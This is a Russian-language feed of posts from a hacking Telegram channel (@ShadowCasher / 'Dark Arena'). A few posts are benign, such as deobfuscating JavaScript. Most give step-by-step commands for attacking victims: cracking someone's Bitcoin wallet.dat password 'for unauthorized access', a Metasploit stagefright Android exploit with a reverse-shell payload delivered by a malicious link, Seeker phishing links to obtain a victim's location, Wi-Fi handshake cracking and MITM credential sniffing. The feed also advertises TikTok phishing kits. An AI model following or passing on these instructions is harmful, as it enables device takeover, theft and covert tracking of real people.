​Разбираем обфусцированный файл на JavaScript

Многие хакеры-злоумышленники научились обфусцировать вредоносный код, чтобы он не поддавался анализу. Именно поэтому сегодня мы разберемся, как деобфусцировать потенциальный вирус на JavaScript.

Для начала обновляем пакеты Kali Linux:
apt update && apt upgrade

Клонируем инструмент с репозитория GitHub:
git clone https://github.com/mindedsecurity/JStillery

Переходим в директорию инструмента:
cd JStillery

И запускаем скрипт:
./jstillery_cli.js <путь к файлу>

Благодаря данной команде инструмент деобфусцирует указанный JavaScript-файл для детального изучения кода, который может представлять опасность.

@ShadowCasher

​Подборка хакерских приложений для Android.

Kali Linux NetHunter — от разработчиков мощнейшей хакерской операционной системы Kali Linux: у вас есть мощная, переносная и недорогая платформа для проведения тестирования на проникновение прямо с вашего смартфона.

Change My MAC — приложение для изменения MAC-адреса вашего устройства.

WiFi Analyzer — опенсорсный и бесплатный сканер Wi-Fi-сетей. Очень удобная утилита для обнаружения точек доступа (включая скрытые), выяснения их параметров (MAC, вендор, канал, тип шифрования), оценки мощности сигнала и расстояния до них.

IsPhoneEncrypted — приложение для проверки шифрования вашего диска.

Intercepter-NG — это продвинутый сниффер, ориентированный на выполнение MITM-атак. Захватывает трафик и анализирует его на лету, автоматически определяя в нем данные авторизации. Умеет сохранять перехваченный трафик в формате .pcap и анализировать его позже.

🔑 Делаем с нуля 1500-3000 рублей в день, полностью без вложений

​​AirGeddon - инструмент для взлома Wi-Fi

Существует такая утилита, как AirCrack. Взлом WiFi с её использованием осуществляется путём перехвата и последующей расшифровки handshake.
AirGeddon - это инструмент, следующего поколения, способный автоматизировать данную операцию.  Он позволит Вам перехватывать и расшифровывать handshake в считанные секунды.

Процесс установки для Kali linux:

💲git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
💲cd airgeddon/
💲sudo bash airgeddon.sh

Сразу после запуска перед вами появится главное меню утилиты. Для перехвата handshake нужно перевести сетевую карту в режим монитора, для этого пропишите "2", а затем "5".

​Взламываем Bitcoin кошелек

Сегодня мы разберемся, как подобрать пароль к wallet.dat для неправомерного доступа к криптовалютному кошельку.

Для начала обновляем пакеты Kali Linux:
apt update && apt upgrade

Устанавливаем все необходимые библиотеки:
apt install wget python -y

Устанавливаем специальный скрипт:
wget https://raw.githubusercontent.com/stricture
/hashstack-server-plugin-oclhashcat/master/scrapers/
bitcoin2hashcat.py

И запускаем его:
python ./bitcoin2hashcat.py <путь до wallet.dat>

Запустится процесс перебора пароля по хешу, который может занять долгое время (зависит от сложности пароля и мощности компьютера). В результате работы скрипта мы можем получить пароль для полного доступа к wallet.dat.

@ShadowCasher

​Взламываем смартфон с помощью ссылки

Сегодня мы разберемся, как получить удаленный доступ к целевому Android-устройству, используя вредоносную ссылку.

Для начала обновляем пакеты Kali Linux:
apt update && apt upgrade

Запускаем предустановленный Metasploit:
msfconsole

Откроется меню инструмента, в котором задействуем эксплойт:
exploit/android/browser/stagefright_mp4_tx3g_64bit

Устанавливаем параметры нашего ip-адреса:
set SRVHOST <ip-адрес>
set LHOST <ip-адрес>

И выставляем следующие параметры:
set URIPATH /
set PAYLOAD linux/armle/mettle/reverse_tcp
set VERBOSE true

Теперь запускаем эксплойт:
exploit -j

Как только эксплойт будет запущен, в окне появится вредоносная ссылка, которую нужно отправить нашей жертве. После того, как наша жертва перейдет по ссылке, мы получил удаленный доступ к устройству.

@ShadowCasher

​Узнаем местоположение с помощью Seeker

Seeker — специальная утилита, размещающая поддельный веб-сайт, который запрашивает разрешение на предоставление пользовательской информации. В том случае, если жертва даст разрешение на предоставление информации, мы получим координаты местоположения нашей жертвы.

Наряду с информацией о местоположении мы также получаем информацию о целевом устройстве.

Перед тем, как установить данный инструмент, обновляем пакеты Termux: pkg update && pkg upgrade

Устанавливаем все необходимые библиотеки:
pkg install git python3 openssh

Далее клонируем инструмент с репозитория GitHub:
git clone https://github.com/thewhiteh4t/seeker.git

Переходим в директорию инструмента:
cd seeker

Делаем скрипт установки исполняемым запускаем:
chmod +x ./termux_install.sh
./termux_install.sh

После того, как процесс установки будет завершен, открываем вторую сессию в Termux и вводим:
ssh -R 80:localhost:8080 ssh.localhost.run

Осталось только запустить инструмент в первой сессии:
python3 seeker.py

Перед нами откроется меню инструмента, в котором нужно получить ссылку на вредоносный сайт, и отправить данную ссылку нашей жертве.

@ShadowCasher

​Подборка самых важных приложений, для вашей безопасности и анонимности.

Представляю вашему вниманию список полезных приложений, которые помогут увеличить вашу безопасность и анонимность. Пользы больше, чем от некоторых Google-сервисов. И кстати, частично польза заключается в том, что теперь вы будете спасены от слежки тех самых Google-сервисов.

▫️Tor Browser — (гайд по настройке)
▫️ Блокировка микрофона
▫️ Блокировка камеры
▫️Диспетчер задач
▫️ FAKE GPS — фейковая геолокация
▫️ WIFI MAC changer — изменяет и подменяет ваш Mac-адрес беспроводного интерфейса на любой Mac-адрес, который вы хотите
▫️ IMEI changer — меняет ваш IMEI (работает с рутом)

Скрипт сервиса для приема смс в Telegram

Качественный скрипт, который поможет Вам поднять собственный сервис для заработка на приеме смс.

🗃 Dark Arena - только лучшее!Dark Arena - только лучшее!

Книга : Стратегии атак и обороны
Автор: Юрий Диогенес, Эрдаль Озкайя

📃Описание :

Как защитить себя от атак? Из этой книги вы узнаете такие моменты:
1) Стратегия безопасности;
2) Управление уязвимостями;
3) Жизненный цикл атаки;
4) Разведка и сбор данных;
5) Компрометация системы;
6) Охота на пользовательские реквизиты;
7) Дальнейшее распространение по сети;
8) Расследование инцидентаc;
9) Процесс реагирования на компьютерные инциденты;
10) Анализ журналов для выявления подозрительной активности;

🗃 Dark Arena - только лучшее!Dark Arena - только лучшее!

Фишинговые сайты TikTok с отправкой логов в телеграм!

4 вида дизайна сайтов в комплекте!

🗃 Dark ArenaDark Arena - только лучшее!